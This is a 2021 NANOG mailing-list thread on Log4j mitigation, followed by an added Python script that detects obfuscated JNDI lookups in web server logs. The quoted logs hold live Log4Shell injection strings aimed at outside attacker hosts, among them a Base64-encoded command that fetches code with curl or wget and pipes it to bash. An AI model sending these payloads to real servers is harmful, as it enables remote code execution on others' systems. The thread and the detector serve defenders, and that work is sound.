Log4j mitigation

Jean St-Laurent jean at ddostest.me
Mon Dec 13 11:46:44 UTC 2021


This should translate into a query from your infected server toward an infected server controlled by a malicious hacker on port 389.

x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}

Right?

Jean

-----Original Message-----
From: Jörg Kost <jk at ip-clear.de> 
Sent: December 13, 2021 6:40 AM
To: Jean St-Laurent <jean at ddostest.me>
Cc: Saku Ytti <saku at ytti.fi>; nanog at nanog.org
Subject: Re: Log4j mitigation

You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), in Headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port. It's not wormy right now, but maybe it will soon.

We have been seeing things like this since the 10th of Dec. And this is only a typical Apache logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" 
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" 
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}
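The log excerpts above show why a plain grep for "jndi:ldap" misses most of the traffic: the lookup is URL-encoded in the request line, or the letters are assembled from ${lower:x} and ${::-x} lookups that Log4j only resolves at evaluation time. The following detector is an added example, not code from this thread or from the NANOG list; it normalizes those obfuscations the way Log4j would (innermost lookup first, repeated until nothing changes) and then reports which JNDI URI scheme each log line carries. The sample log lines and the 203.0.113.x / 198.51.100.x addresses and "collab.example" host are constructed placeholders.

```python
import re
import urllib.parse

# Innermost Log4j lookup: a ${...} whose body contains no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and the URI scheme it uses (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve_inner(body):
    """Collapse one obfuscating lookup to the text it evaluates to.

    Returns None for lookups we deliberately leave alone: the JNDI lookup
    itself (so it can't be hidden behind a ':-' default) and lookups such as
    ${hostName} or ${date:...} that need a live Log4j context to evaluate.
    """
    if re.match(r"\s*jndi\s*:", body, re.IGNORECASE):
        return None
    if ":-" in body:                       # ${::-x} or ${env:NOPE:-x} -> x
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):  # ${lower:X} -> x
        return body[6:].lower()
    if body.lower().startswith("upper:"):  # ${upper:x} -> X
        return body[6:].upper()
    return None


def normalize(text, max_rounds=20):
    """Undo URL encoding and peel obfuscating lookups from the inside out."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)   # %7B -> {, %24 -> $, handles double encoding

        def repl(match):
            resolved = _resolve_inner(match.group(1))
            return match.group(0) if resolved is None else resolved

        text = INNER_LOOKUP.sub(repl, text)
        if text == before:                  # fixed point reached
            break
    return text


def find_jndi_schemes(line):
    """Return the URI schemes of every JNDI lookup hidden in one log line."""
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(normalize(line))]


def scan_log(lines):
    """Return (line_number, schemes) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        schemes = find_jndi_schemes(line)
        if schemes:
            hits.append((number, schemes))
    return hits


# Constructed Apache combined-format lines mirroring the obfuscation styles above.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Dec/2021:06:40:00 +0000] "GET /?x=${jndi:ldap://${hostName}.collab.example/a} HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Dec/2021:06:40:01 +0000] "GET /$%7Bjndi:dns://203.0.113.9/securityscan-http80%7D HTTP/1.1" 301 281 "-" "-"',
    '203.0.113.5 - - [13/Dec/2021:06:40:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://203.0.113.9:12344/a}"',
    '203.0.113.5 - - [13/Dec/2021:06:40:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.collab.example}"',
    '198.51.100.7 - - [13/Dec/2021:06:41:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "curl/7.79.1"',
    '198.51.100.7 - - [13/Dec/2021:06:41:01 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for number, schemes in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {', '.join(schemes)}")
```

Lines 1 through 4 are flagged (ldap, dns, ldap, ldap) and the two benign lines are not; the ${date:yyyy} lookup on the last line is left alone because the scanner keys on the JNDI lookup rather than on any ${ at all. Feed it the request line, referer and user-agent fields of whatever your Java services log, since, as the thread notes, any logged field can carry the string.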
